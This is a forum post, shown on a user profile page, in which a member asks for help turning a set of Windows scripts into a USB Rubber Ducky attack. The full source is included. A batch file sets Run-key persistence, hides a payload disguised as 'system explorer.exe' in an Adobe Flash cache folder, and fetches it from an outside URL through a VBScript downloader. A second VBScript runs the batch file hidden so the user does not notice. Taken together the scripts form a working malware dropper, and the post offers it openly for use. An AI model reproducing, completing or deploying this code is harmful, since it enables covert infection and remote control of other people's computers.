Jump to content

yanuszek2

Members
 View Profile  See their activity

  • Posts

    1

  • Joined

  • Last visited

Recent Profile Visitors

597 profile views

yanuszek2's Achievements

Newbie

Newbie (1/14)

  1. yanuszek2
    I want to create somehting to want 3 files detailed below on rubberducky: ..bat - Main script wget.vbs - VBScript download "payload" system.vbs - VBScript start .bat file in stealth way. ..bat - What it do? 1. Its adding new value to "system" registry "HKCU\software\microsoft\windows\currentversion\run", so it can start every time with restart of the system. 2. Script also checking if we have "payload" (named explorer.exe) here: "%appdata%\Adobe\Flash Player\NativeCache" | If it will find right file, its going to run it. wget.vbs - If script will not find file, its going to download it via wget.vbs and then will run it. system.vbs - Is also added to autostart, so we can activate script without user notice. Any ideas how i can make it work/convert to rubber ducky? Here you can see source files of these scripts; ..bat @echo off %windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v System /d "wscript \"%appdata%\Adobe\Flash Player\NativeCache\system.vbs\" \"%appdata%\Adobe\Flash Player\NativeCache\..bat\"" /f IF EXIST "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" ( start /b /normal "a" "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" ) IF NOT EXIST "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" ( wscript.exe "%appdata%\Adobe\Flash Player\NativeCache\wget.vbs" http://www.meon.nl/sajsy/dokunty.ex"%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" start /b /normal "a" "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" ) system.vbs CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False wget.vbs 'wget.vbs - similar to wget but written in vbscript 'based on a script by Chrissy LeMaire ' Usage if WScript.Arguments.Count < 1 then MsgBox "Usage: wget.vbs <url> (file)" WScript.Quit end if ' Arguments URL = WScript.Arguments(0) if WScript.Arguments.Count > 1 then saveTo = WScript.Arguments(1) else parts = split(url,"/") saveTo = parts(ubound(parts)) end if ' Fetch the file Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP") objXMLHTTP.open "GET", URL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo Set objFSO = Nothing objADOStream.SaveToFile saveTo objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing ' Done WScript.Quit
×
×
  • Create New...